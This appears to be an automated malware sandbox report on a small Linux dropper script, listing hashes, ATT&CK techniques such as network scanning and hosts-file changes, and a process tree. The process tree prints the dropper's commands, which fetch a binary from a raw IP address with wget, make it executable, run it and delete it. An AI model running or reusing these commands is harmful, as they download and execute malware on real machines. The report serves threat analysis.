ffe9a29f878e5f4858347527510d65fd8d9d59a071dfb7a5d6ee8ce64394819a

Analysis

max time kernel
21064s
max time network
135s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-08-2022 11:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b
Size

449B
MD5

1b6c2e23804389fb3c4a9ddcce882f5d
SHA1

0c086d7aa61e5c5a4de5c4e4d769c9c7440c8bbd
SHA256

ffe9a29f878e5f4858347527510d65fd8d9d59a071dfb7a5d6ee8ce64394819a
SHA512

8a4300b60ee626a8b7a9719ee1b16378802a3989f78ad895c4f3c17d385a0ae76d3113c50095b343f7836db5b7356e31f342afecf199c005d3ee2f26d40d741a

Score

9^/10

discovery

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.

Processes:

description ioc

/etc/hosts /etc/hosts
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

description ioc

/etc/resolv.conf /etc/resolv.conf
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc
/etc/hosts	/etc/hosts

description	ioc
/etc/resolv.conf	/etc/resolv.conf

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

indexindex

description	ioc	process
/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	index
/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	index

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

Processes:

indexindex

description	ioc	process
/proc/sys/net/core/somaxconn	/proc/sys/net/core/somaxconn	index
/proc/self/exe	/proc/self/exe	index
/proc/self/exe	/proc/self/exe	index
/proc/stat	/proc/stat	index

Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.

Processes:

bwgetrmrm

description ioc process

/tmp/b /tmp/b b
/tmp/index /tmp/index wget
/tmp/index /tmp/index rm
/tmp/index /tmp/index rm

description	ioc	process
/tmp/b	/tmp/b	b
/tmp/index	/tmp/index	wget
/tmp/index	/tmp/index	rm
/tmp/index	/tmp/index	rm

/tmp/b
/tmp/b
1⤵
- Writes file to tmp directory
PID:592

/usr/bin/wget
wget http://103.16.170.89:8080/docs/Ls -O /tmp/index
2⤵
- Writes file to tmp directory
PID:593

/bin/chmod
chmod 777 /tmp/index
2⤵
PID:599

/tmp/index
/tmp/index
2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:600

/tmp/index
/tmp/index
3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:648

/bin/sleep
sleep 2
2⤵
PID:649

/bin/rm
rm -rf /tmp/index
2⤵
- Writes file to tmp directory
PID:651

/bin/rm
rm -rf "/tmp/index "
2⤵
- Writes file to tmp directory
PID:652

/usr/bin/whoami
whoami
2⤵
PID:653

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Scanning

T1046

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

T1568

Web Service

T1102

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads